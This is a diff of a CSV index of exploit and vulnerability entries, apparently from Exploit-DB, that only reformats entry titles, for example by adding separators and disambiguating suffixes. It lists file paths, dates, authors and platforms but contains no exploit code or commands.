3923,platforms/php/webapps/3923.txt,"linksnet newsfeed 1.0 - Remote File Inclusion Vulnerability",2007-05-14,"ThE TiGeR",php,webapps,0 3924,platforms/php/webapps/3924.txt,"Media Gallery for Geeklog <= 1.4.8a Remote File Inclusion Vulnerability",2007-05-14,"ThE TiGeR",php,webapps,0 3925,platforms/windows/remote/3925.py,"TinyIdentD <= 2.2 - Remote Buffer Overflow Exploit",2007-05-14,"Thomas Pollet",windows,remote,113 @@ -3628,7 +3628,7 @@ id,file,description,date,author,platform,type,port 3972,platforms/php/webapps/3972.txt,"Scallywag (template.php path) Remote File Inclusion Vulnerabilities",2007-05-23,"Mehmet Ince",php,webapps,0 3973,platforms/windows/dos/3973.html,"Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote DoS Exploit",2007-05-23,shinnai,windows,dos,0 3974,platforms/php/webapps/3974.pl,"Dokeos <= 1.8.0 (my_progress.php course) Remote SQL Injection Exploit",2007-05-23,Silentz,php,webapps,0 -3975,platforms/windows/local/3975.c,"MagicISO <= 5.4 (build239) .cue File Local Buffer Overflow Exploit",2007-05-23,vade79,windows,local,0 +3975,platforms/windows/local/3975.c,"MagicISO <= 5.4 (build239) - .cue File Local Buffer Overflow Exploit",2007-05-23,vade79,windows,local,0 3976,platforms/windows/dos/3976.pl,"Microsoft Visual Basic 6.0 Project (Company Name) Stack Overflow PoC",2007-05-23,UmZ,windows,dos,0 3977,platforms/windows/dos/3977.pl,"Microsoft Visual Basic 6.0 Project (Description) Stack Overflow PoC",2007-05-23,UmZ,windows,dos,0 3978,platforms/windows/dos/3978.pl,"UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow PoC",2007-05-24,n00b,windows,dos,0 @@ -3676,7 +3676,7 @@ id,file,description,date,author,platform,type,port 4021,platforms/windows/remote/4021.html,"Zenturi ProgramChecker ActiveX (sasatl.dll) Remote BoF Exploit",2007-06-01,shinnai,windows,remote,0 4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion Exploit",2007-06-01,GoLd_M,php,webapps,0 4023,platforms/windows/remote/4023.html,"Microsoft Internet Explorer 6 / Provideo Camimage - (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit",2007-06-02,rgod,windows,remote,0 -4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit",2007-06-02,n00b,windows,local,0 +4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional - .PLF file Buffer Overflow Exploit",2007-06-02,n00b,windows,local,0 4025,platforms/php/webapps/4025.php,"Quick.Cart <= 2.2 - RFI/LFI Remote Code Execution Exploit",2007-06-02,Kacper,php,webapps,0 4026,platforms/php/webapps/4026.php,"PNphpBB2 <= 1.2 - (index.php c) Remote SQL Injection Exploit",2007-06-03,Kacper,php,webapps,0 4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - PRE AUTH Remote Exploit",2007-06-03,muts,windows,remote,8080 @@ -3717,7 +3717,7 @@ id,file,description,date,author,platform,type,port 4063,platforms/php/webapps/4063.txt,"xoops module tinycontent 1.5 - Remote File Inclusion Vulnerability",2007-06-12,Sp[L]o1T,php,webapps,0 4064,platforms/php/webapps/4064.txt,"xoops module horoscope <= 2.0 - Remote File Inclusion Vulnerability",2007-06-12,BeyazKurt,php,webapps,0 4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX Control - Remote BoF Exploit (Windows 2000 SP4)",2007-06-13,rgod,windows,remote,0 -4066,platforms/windows/remote/4066.html,"Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)",2007-06-13,rgod,windows,remote,0 +4066,platforms/windows/remote/4066.html,"Microsoft Speech API ActiveX Control - Remote BoF Exploit (Windows XP SP2)",2007-06-13,rgod,windows,remote,0 4067,platforms/windows/dos/4067.html,"Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)",2007-06-13,"YAG KOHHA",windows,dos,0 4068,platforms/php/webapps/4068.txt,"XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability",2007-06-13,Sp[L]o1T,php,webapps,0 4069,platforms/php/webapps/4069.txt,"XOOPS Module XT-Conteudo - (spaw_root) RFI Vulnerability",2007-06-13,g00ns,php,webapps,0 @@ -4010,7 +4010,7 @@ id,file,description,date,author,platform,type,port 4361,platforms/windows/local/4361.pl,"Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec Exploit",2007-09-04,Koshi,windows,local,0 4362,platforms/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Transversal Exploit",2007-09-04,Katatafish,linux,remote,0 4363,platforms/php/webapps/4363.txt,"PHPOF <= 20040226 - (DB_adodb.class.php) RFI Vulnerability",2007-09-04,"ThE TiGeR",php,webapps,0 -4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 (pls File) Local Buffer OverFlow Exploit",2007-09-05,0x58,windows,local,0 +4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - (pls File) Local Buffer OverFlow Exploit",2007-09-05,0x58,windows,local,0 4365,platforms/php/webapps/4365.txt,"AnyInventory <= 2.0 - (environment.php) Remote File Inclusion Vulnerability",2007-09-05,"ThE TiGeR",php,webapps,0 4366,platforms/windows/remote/4366.html,"GlobalLink 2.7.0.8 glItemCom.dll SetInfo() Heap Overflow Exploit",2007-09-05,void,windows,remote,0 4367,platforms/windows/remote/4367.c,"Trend Micro ServerProtect eng50.dll - Remote Stack Overflow Exploit",2007-09-06,devcode,windows,remote,0 @@ -4704,9 +4704,9 @@ id,file,description,date,author,platform,type,port 5064,platforms/php/webapps/5064.txt,"All Club CMS <= 0.0.2 index.php Remote SQL Injection Vulnerability",2008-02-05,ka0x,php,webapps,0 5065,platforms/php/webapps/5065.txt,"Photokorn Gallery 1.543 (pic) SQL Injection Vulnerability",2008-02-05,you_kn0w,php,webapps,0 5066,platforms/php/webapps/5066.php,"WordPress MU < 1.3.2 - active_plugins option Code Execution Exploit",2008-02-05,"Alexander Concha",php,webapps,0 -5067,platforms/windows/dos/5067.pl,"dBpowerAMP Audio Player Release 2 M3U File Buffer Overflow PoC",2008-02-05,securfrog,windows,dos,0 +5067,platforms/windows/dos/5067.pl,"dBpowerAMP Audio Player Release 2 - M3U File Buffer Overflow PoC",2008-02-05,securfrog,windows,dos,0 5068,platforms/php/webapps/5068.txt,"OpenSiteAdmin <= 0.9.1.1 - Multiple File Inclusion Vulnerabilities",2008-02-06,Trancek,php,webapps,0 -5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player Release 2 M3U File Buffer Overflow Exploit",2008-02-06,securfrog,windows,remote,0 +5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player Release 2 - M3U File Buffer Overflow Exploit",2008-02-06,securfrog,windows,remote,0 5070,platforms/php/webapps/5070.pl,"MyBulletinBoard (MyBB) <= 1.2.11 - private.php SQL Injection Exploit",2008-02-06,F,php,webapps,0 5071,platforms/php/webapps/5071.txt,"Astanda Directory Project 1.2 - (link_id) SQL Injection Vulnerability",2008-02-06,you_kn0w,php,webapps,0 5072,platforms/php/webapps/5072.txt,"Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability",2008-02-06,Crackers_Child,php,webapps,0 @@ -4762,7 +4762,7 @@ id,file,description,date,author,platform,type,port 5122,platforms/windows/dos/5122.pl,"Rosoft Media Player 4.1.8 M3U File Remote Buffer Overflow PoC",2008-02-14,securfrog,windows,dos,0 5123,platforms/php/webapps/5123.txt,"Scribe <= 0.2 (index.php page) Local File Inclusion Vulnerability",2008-02-14,muuratsalo,php,webapps,0 5124,platforms/php/webapps/5124.txt,"freePHPgallery 0.6 Cookie Local File Inclusion Vulnerability",2008-02-14,MhZ91,php,webapps,0 -5125,platforms/php/webapps/5125.txt,"PHP Live! <= 3.2.2 (questid) Remote SQL Injection Vulnerability",2008-02-14,Xar,php,webapps,0 +5125,platforms/php/webapps/5125.txt,"PHP Live! <= 3.2.2 - (questid) Remote SQL Injection Vulnerability (1)",2008-02-14,Xar,php,webapps,0 5126,platforms/php/webapps/5126.txt,"WordPress Plugin Simple Forum 2.0-2.1 - SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10-1.11 - SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 5128,platforms/php/webapps/5128.txt,"Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability",2008-02-15,Don,php,webapps,0 @@ -4947,7 +4947,7 @@ id,file,description,date,author,platform,type,port 5311,platforms/php/webapps/5311.txt,"TopperMod 2.0 - Remote SQL Injection Vulnerability",2008-03-25,girex,php,webapps,0 5312,platforms/php/webapps/5312.txt,"TopperMod 1.0 (mod.php) Local File Inclusion Vulnerability",2008-03-25,girex,php,webapps,0 5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G (firmware 1.00.9) - Security Bypass Vulnerabilities",2008-03-26,meathive,hardware,remote,0 -5314,platforms/windows/remote/5314.py,"TFTP Server for Windows 1.4 - ST Buffer Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69 +5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69 5315,platforms/windows/remote/5315.py,"Quick TFTP Pro 2.1 - Remote SEH Overflow Exploit (0day)",2008-03-26,muts,windows,remote,69 5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote DoS Exploit",2008-03-26,muts,windows,dos,0 5317,platforms/php/webapps/5317.txt,"JAF-CMS 4.0 RC2 - Multiple Remote File Inclusion Vulnerabilities",2008-03-26,CraCkEr,php,webapps,0 @@ -5320,7 +5320,7 @@ id,file,description,date,author,platform,type,port 5693,platforms/php/webapps/5693.txt,"CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability",2008-05-29,Stack,php,webapps,0 5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,623 5695,platforms/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,8800 -5696,platforms/php/webapps/5696.pl,"PHP Booking Calendar 10 d Remote SQL Injection Exploit",2008-05-29,Stack,php,webapps,0 +5696,platforms/php/webapps/5696.pl,"PHP Booking Calendar 10 d - Remote SQL Injection Exploit",2008-05-29,Stack,php,webapps,0 5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 5698,platforms/php/webapps/5698.txt,"HiveMaker Professional <= 1.0.2 (cid) SQL Injection Vulnerability",2008-05-30,K-159,php,webapps,0 5699,platforms/php/webapps/5699.txt,"PsychoStats <= 2.3.3 - Multiple Remote SQL Injection Vulnerabilities",2008-05-31,Mr.SQL,php,webapps,0 @@ -5430,7 +5430,7 @@ id,file,description,date,author,platform,type,port 5805,platforms/asp/webapps/5805.txt,"E-SMART CART (productsofcat.asp) Remote SQL Injection Vulnerability",2008-06-13,JosS,asp,webapps,0 5806,platforms/php/webapps/5806.pl,"GLLCTS2 (listing.php sort) Remote Blind SQL Injection Exploit",2008-06-13,N/A,php,webapps,0 5807,platforms/php/webapps/5807.txt,"PHP JOBWEBSITE PRO (JobSearch3.php) SQL Injection Vulnerability",2008-06-13,JosS,php,webapps,0 -5808,platforms/php/webapps/5808.txt,"Mambo <= 4.6.4 (Output.php) Remote File Inclusion Vulnerability",2008-06-13,irk4z,php,webapps,0 +5808,platforms/php/webapps/5808.txt,"Mambo <= 4.6.4 - (Output.php) Remote File Inclusion Vulnerability",2008-06-13,irk4z,php,webapps,0 5809,platforms/php/webapps/5809.txt,"Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability",2008-06-14,JosS,php,webapps,0 5810,platforms/php/webapps/5810.txt,"contenido 4.8.4 - (RFI/XSS) Multiple Vulnerabilities",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0 5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple Remote SQL Injection Vulnerabilities",2008-06-14,"CWH Underground",php,webapps,0 @@ -5570,7 +5570,7 @@ id,file,description,date,author,platform,type,port 5948,platforms/php/webapps/5948.txt,"Jokes Complete Website 2.1.3 (jokeid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0 5949,platforms/php/webapps/5949.txt,"Drinks Complete Website 2.1.0 (drinkid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0 5950,platforms/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 (itemid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0 -5951,platforms/windows/local/5951.c,"XnView 1.93.6 for Windows - '.taac' Local Buffer Overflow Exploit PoC",2008-06-26,Shinnok,windows,local,0 +5951,platforms/windows/local/5951.c,"XnView 1.93.6 - '.taac' Local Buffer Overflow Exploit PoC",2008-06-26,Shinnok,windows,local,0 5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,CraCkEr,php,webapps,0 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts Nms Insecure Cookie Handling Vulnerability",2008-06-26,"Virangar Security",php,webapps,0 5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 (params.php) Remote File Inclusion Vulnerability",2008-06-26,Ciph3r,php,webapps,0 @@ -5729,12 +5729,12 @@ id,file,description,date,author,platform,type,port 6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit",2008-07-21,ldma,php,webapps,0 6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 (pid) Remote SQL Injection Vulnerability",2008-07-21,Cr@zy_King,php,webapps,0 6115,platforms/php/webapps/6115.txt,"EZWebAlbum Insecure Cookie Handling Vulnerability",2008-07-21,"Virangar Security",php,webapps,0 -6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit",2008-07-22,"Guido Landi",windows,remote,0 +6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit (Perl)",2008-07-22,"Guido Landi",windows,remote,0 6117,platforms/php/webapps/6117.txt,"youtube blog 0.1 - (RFI/SQLl/XSS) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0 6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution Exploit",2008-07-22,Koshi,windows,remote,0 6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll (default.asp catid) SQL Injection Vulnerability",2008-07-22,DreamTurk,asp,webapps,0 6120,platforms/minix/dos/6120.txt,"minix 3.1.2a tty panic Local Denial of Service Vulnerability",2008-07-23,kokanin,minix,dos,0 -6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit",2008-07-23,r0ut3r,windows,remote,0 +6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit (C)",2008-07-23,r0ut3r,windows,remote,0 6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1-9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (Metasploit)",2008-07-23,I)ruid,multiple,remote,0 6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (Python)",2008-07-24,"Julien Desfossez",multiple,remote,0 6124,platforms/windows/remote/6124.c,"Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit",2008-07-24,callAX,windows,remote,0 @@ -5801,7 +5801,7 @@ id,file,description,date,author,platform,type,port 6185,platforms/php/webapps/6185.txt,"Scripts24 iTGP 1.0.4 (id) Remote SQL Injection Vulnerability",2008-08-01,Mr.SQL,php,webapps,0 6186,platforms/php/webapps/6186.txt,"Scripts24 iPost 1.0.1 (id) Remote SQL Injection Vulnerability",2008-08-01,Mr.SQL,php,webapps,0 6187,platforms/php/webapps/6187.txt,"eStoreAff 0.1 (cid) Remote SQL Injection Vulnerability",2008-08-01,Mr.SQL,php,webapps,0 -6188,platforms/windows/local/6188.c,"IrfanView <= 3.99 IFF File Local Stack Buffer Overflow Exploit",2008-08-01,"fl0 fl0w",windows,local,0 +6188,platforms/windows/local/6188.c,"IrfanView <= 3.99 - IFF File Local Stack Buffer Overflow Exploit",2008-08-01,"fl0 fl0w",windows,local,0 6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart (id) Remote SQL Injection Vulnerability",2008-08-01,"Hussin X",php,webapps,0 6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple Remote SQL Injection Vulnerabilities",2008-08-01,cOndemned,php,webapps,0 6191,platforms/php/webapps/6191.txt,"e-vision CMS <= 2.02 - (SQL/upload/ig) Multiple Vulnerabilities",2008-08-02,"Khashayar Fereidani",php,webapps,0 @@ -5819,8 +5819,8 @@ id,file,description,date,author,platform,type,port 6206,platforms/php/webapps/6206.txt,"LiteNews <= 0.1 Insecure Cookie Handling Vulnerability",2008-08-05,Scary-Boys,php,webapps,0 6207,platforms/php/webapps/6207.txt,"LiteNews <= 0.1 (id) Remote SQL Injection Vulnerability",2008-08-05,Stack,php,webapps,0 6208,platforms/php/webapps/6208.txt,"Multiple Wsn Products - (LFI) Code Execution Vulnerability",2008-08-06,otmorozok428,php,webapps,0 -6209,platforms/php/webapps/6209.rb,"LoveCMS 1.6.2 Final Remote Code Execution Exploit",2008-08-06,PoMdaPiMp,php,webapps,0 -6210,platforms/php/webapps/6210.rb,"LoveCMS 1.6.2 Final Update Settings Remote Exploit",2008-08-06,PoMdaPiMp,php,webapps,0 +6209,platforms/php/webapps/6209.rb,"LoveCMS 1.6.2 Final - Remote Code Execution Exploit",2008-08-06,PoMdaPiMp,php,webapps,0 +6210,platforms/php/webapps/6210.rb,"LoveCMS 1.6.2 Final - Update Settings Remote Exploit",2008-08-06,PoMdaPiMp,php,webapps,0 6211,platforms/php/webapps/6211.txt,"quate CMS 0.3.4 - (LFI/XSS) Multiple Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0 6213,platforms/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 Insecure Cookie Handling Vulnerability",2008-08-06,Scary-Boys,php,webapps,0 6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit",2008-08-06,james,php,webapps,0 @@ -5851,7 +5851,7 @@ id,file,description,date,author,platform,type,port 6240,platforms/windows/dos/6240.py,"FlashGet 1.9 - (FTP PWD Response) Remote BoF Exploit PoC (0day)",2008-08-13,h07,windows,dos,0 6244,platforms/windows/dos/6244.js,"Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BoF PoC",2008-08-14,Symantec,windows,dos,0 6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 (id) Multiple Local File Inclusion Vulnerabilities",2008-08-15,Don,php,webapps,0 -6248,platforms/windows/remote/6248.pl,"FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit",2008-08-15,SkOd,windows,remote,21 +6248,platforms/windows/remote/6248.pl,"FlashGet 1.9.0.1012 - (FTP PWD Response) SEH STACK Overflow Exploit",2008-08-15,SkOd,windows,remote,21 6249,platforms/php/webapps/6249.txt,"ZEEJOBSITE 2.0 (adid) Remote SQL Injection Vulnerability",2008-08-15,"Hussin X",php,webapps,0 6250,platforms/php/webapps/6250.txt,"deeemm CMS (dmcms) 0.7.4 - Multiple Vulnerabilities",2008-08-15,"Khashayar Fereidani",php,webapps,0 6251,platforms/windows/dos/6251.txt,"ESET Smart Security 3.0.667.0 - Privilege Escalation PoC",2008-08-16,g_,windows,dos,0 @@ -5859,7 +5859,7 @@ id,file,description,date,author,platform,type,port 6253,platforms/windows/dos/6253.txt,"EO Video 1.36 - Local Heap Overflow DoS / PoC",2008-08-16,j0rgan,windows,dos,0 6254,platforms/php/webapps/6254.txt,"XNova 0.8 sp1 (xnova_root_path) Remote File Inclusion Vulnerability",2008-08-17,NuclearHaxor,php,webapps,0 6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - (cat) Remote SQL Injection Vulnerability",2008-08-17,"Hussin X",php,webapps,0 -6256,platforms/windows/remote/6256.pl,"FlashGet 1.9.0.1012 (FTP PWD Response) BoF Exploit (safeseh)",2008-08-17,"Guido Landi",windows,remote,0 +6256,platforms/windows/remote/6256.pl,"FlashGet 1.9.0.1012 - (FTP PWD Response) BoF Exploit (SafeSEH)",2008-08-17,"Guido Landi",windows,remote,0 6257,platforms/windows/dos/6257.pl,"WS_FTP Home/Professional FTP Client Remote Format String PoC",2008-08-17,securfrog,windows,dos,0 6258,platforms/php/webapps/6258.txt,"PHPBasket (product.php pro_id) SQL Injection Vulnerability",2008-08-17,r45c4l,php,webapps,0 6259,platforms/php/webapps/6259.txt,"VidiScript (Avatar) Remote Arbitrary File Upload Vulnerability",2008-08-18,InjEctOr5,php,webapps,0 @@ -6803,7 +6803,7 @@ id,file,description,date,author,platform,type,port 7253,platforms/php/webapps/7253.txt,"Booking Centre 2.01 (HotelID) Remote SQL Injection Vulnerability",2008-11-27,R3d-D3V!L,php,webapps,0 7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - (Auth Bypass) SQL Injection Vulnerability",2008-11-27,Cyber-Zone,php,webapps,0 7255,platforms/php/webapps/7255.txt,"pagetree CMS 0.0.2 beta 0001 - Remote File Inclusion Vulnerability",2008-11-27,NoGe,php,webapps,0 -7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script (id) Remote SQL Injection Vulnerability",2008-11-27,The_5p3ctrum,php,webapps,0 +7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - (id) Remote SQL Injection Vulnerability (1)",2008-11-27,The_5p3ctrum,php,webapps,0 7258,platforms/php/webapps/7258.txt,"Ocean12 FAQ Manager Pro Database Disclosure Vulnerability",2008-11-27,Stack,php,webapps,0 7259,platforms/asp/webapps/7259.txt,"comersus asp shopping cart - (DD/XSS) Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,asp,webapps,0 7260,platforms/php/webapps/7260.txt,"BaSiC-CMS (acm2000.mdb) Remote Database Disclosure Vulnerability",2008-11-28,Stack,php,webapps,0 @@ -7214,7 +7214,7 @@ id,file,description,date,author,platform,type,port 7674,platforms/php/webapps/7674.txt,"PHPAuctionSystem Insecure Cookie Handling Vulnerability",2009-01-05,ZoRLu,php,webapps,0 7675,platforms/multiple/local/7675.txt,"Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit",2009-01-06,sh2kerr,multiple,local,0 7676,platforms/multiple/local/7676.txt,"Oracle 10g SYS.LT.MERGEWORKSPACE SQL Injection Exploit",2009-01-06,sh2kerr,multiple,local,0 -7677,platforms/multiple/local/7677.txt,"Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit",2009-01-06,sh2kerr,multiple,local,0 +7677,platforms/multiple/local/7677.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit (1)",2009-01-06,sh2kerr,multiple,local,0 7678,platforms/php/webapps/7678.txt,"PHPAuctionSystem Multiple Remote File Inclusion Vulnerabilities",2009-01-06,darkmasking,php,webapps,0 7679,platforms/php/webapps/7679.php,"RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit",2009-01-06,cOndemned,php,webapps,0 7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - (XSS/SQL) Multiple Vulnerabilities",2009-01-06,!-BUGJACK-!,php,webapps,0 @@ -7378,12 +7378,12 @@ id,file,description,date,author,platform,type,port 7840,platforms/php/webapps/7840.pl,"Joomla Com BazaarBuilder Shopping Cart 5.0 - SQL Injection Exploit",2009-01-21,XaDoS,php,webapps,0 7841,platforms/php/webapps/7841.txt,"Mambo Component SOBI2 RC 2.8.2 (bid) SQL Injection Vulnerability",2009-01-21,"Br1ght D@rk",php,webapps,0 7842,platforms/windows/remote/7842.html,"Firefox 3.0.5 Status Bar Obfuscation / Clickjacking",2009-01-21,MrDoug,windows,remote,0 -7843,platforms/windows/local/7843.c,"Browser3D 3.5 - (.sfs) Local Stack Overflow Exploit",2009-01-22,SimO-s0fT,windows,local,0 +7843,platforms/windows/local/7843.c,"Browser3D 3.5 - (.sfs) Local Stack Overflow Exploit (C)",2009-01-22,SimO-s0fT,windows,local,0 7844,platforms/php/webapps/7844.py,"Sad Raven's Click Counter 1.0 passwd.dat Disclosure Exploit",2009-01-21,Pouya_Server,php,webapps,0 7845,platforms/hardware/remote/7845.txt,"AXIS 70U - Network Document Server Privilege Escalation/XSS",2009-01-21,DSecRG,hardware,remote,0 7846,platforms/php/webapps/7846.php,"Joomla com_pcchess (game_id) Blind SQL Injection Exploit",2009-01-21,InjEctOr5,php,webapps,0 7847,platforms/php/webapps/7847.txt,"Joomla Component beamospetition 1.0.12 SQL Injection / XSS",2009-01-21,vds_s,php,webapps,0 -7848,platforms/windows/local/7848.pl,"Browser3D 3.5 - (.sfs) Local Stack Overflow Exploit",2009-01-22,AlpHaNiX,windows,local,0 +7848,platforms/windows/local/7848.pl,"Browser3D 3.5 - (.sfs) Local Stack Overflow Exploit (Perl)",2009-01-22,AlpHaNiX,windows,local,0 7849,platforms/php/webapps/7849.txt,"OwnRS Blog 1.2 (autor.php) SQL Injection Vulnerability",2009-01-22,nuclear,php,webapps,0 7850,platforms/asp/webapps/7850.txt,"asp-project 1.0 Insecure Cookie Method Vulnerability",2009-01-22,"Khashayar Fereidani",asp,webapps,0 7851,platforms/php/webapps/7851.php,"Pardal CMS <= 0.2.0 - Blind SQL Injection Exploit",2009-01-22,darkjoker,php,webapps,0 @@ -7933,7 +7933,7 @@ id,file,description,date,author,platform,type,port 8424,platforms/php/webapps/8424.txt,"ablespace 1.0 - (XSS/bSQL) Multiple Vulnerabilities",2009-04-14,DSecRG,php,webapps,0 8425,platforms/php/webapps/8425.txt,"php-revista 1.1.2 - (RFI/SQLi/cb/XSS) Multiple Vulnerabilities",2009-04-14,SirDarckCat,php,webapps,0 8426,platforms/windows/local/8426.pl,"Shadow Stream Recorder - (.m3u) Universal Stack Overflow Exploit",2009-04-14,AlpHaNiX,windows,local,0 -8427,platforms/windows/local/8427.py,"Easy RM to MP3 Converter Universal Stack Overflow Exploit",2009-04-14,Stack,windows,local,0 +8427,platforms/windows/local/8427.py,"Easy RM to MP3 Converter - Universal Stack Overflow Exploit",2009-04-14,Stack,windows,local,0 8428,platforms/windows/remote/8428.txt,"MonGoose 2.4 - Webserver Directory Traversal Vulnerability (Windows)",2009-04-14,e.wiZz!,windows,remote,0 8429,platforms/multiple/dos/8429.pl,"Steamcast 0.9.75b Remote Denial of Service Exploit",2009-04-14,ksa04,multiple,dos,0 8430,platforms/openbsd/dos/8430.py,"OpenBSD <= 4.5 IP datagram Null Pointer Deref DoS Exploit",2009-04-14,nonroot,openbsd,dos,0 @@ -8025,7 +8025,7 @@ id,file,description,date,author,platform,type,port 8516,platforms/php/webapps/8516.txt,"WebPortal CMS 0.8b - Multiple Remote/Local File Inclusion Vulnerabilities",2009-04-22,ahmadbady,php,webapps,0 8517,platforms/php/webapps/8517.txt,"Joomla Component rsmonials Remote Cross-Site Scripting Exploit",2009-04-22,jdc,php,webapps,0 8518,platforms/windows/remote/8518.pl,"Femitter FTP Server 1.03 - Arbitrary File Disclosure Exploit",2009-04-22,Stack,windows,remote,0 -8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit",2009-04-22,Stack,windows,local,0 +8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit (1)",2009-04-22,Stack,windows,local,0 8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit (2)",2009-04-22,His0k4,windows,local,0 8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 - (ab/LFI/su) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0 8522,platforms/windows/dos/8522.pl,"Zervit Web Server <= 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 @@ -8542,7 +8542,7 @@ id,file,description,date,author,platform,type,port 9057,platforms/php/webapps/9057.txt,"tsep <= 0.942.02 - Multiple Vulnerabilities",2009-06-30,eLwaux,php,webapps,0 9058,platforms/php/webapps/9058.pl,"PunBB Extension Vote For Us <= 1.0.1 - Blind SQL Injection Exploit",2009-06-30,Dante90,php,webapps,0 9059,platforms/php/webapps/9059.htm,"Messages Library 2.0 - Arbitrary Administrator Account Vulnerability",2009-06-30,"ThE g0bL!N",php,webapps,0 -9060,platforms/windows/local/9060.pl,"MP3-Nator 2.0 (plf File) Universal Buffer Overflow Exploit (SEH)",2009-07-01,"ThE g0bL!N",windows,local,0 +9060,platforms/windows/local/9060.pl,"MP3-Nator 2.0 - (plf File) Universal Buffer Overflow Exploit (SEH)",2009-07-01,"ThE g0bL!N",windows,local,0 9061,platforms/windows/dos/9061.pl,"PEamp 1.02b - (.M3U) Local Buffer Overflow PoC",2009-07-01,"ThE g0bL!N",windows,dos,0 9062,platforms/php/webapps/9062.txt,"Messages Library 2.0 - Arbitrary Delete Message Vulnerability",2009-07-01,Stack,php,webapps,0 9063,platforms/php/webapps/9063.txt,"Messages Library 2.0 Insecure Cookie Handling Vulnerability",2009-07-01,Stack,php,webapps,0 @@ -8554,7 +8554,7 @@ id,file,description,date,author,platform,type,port 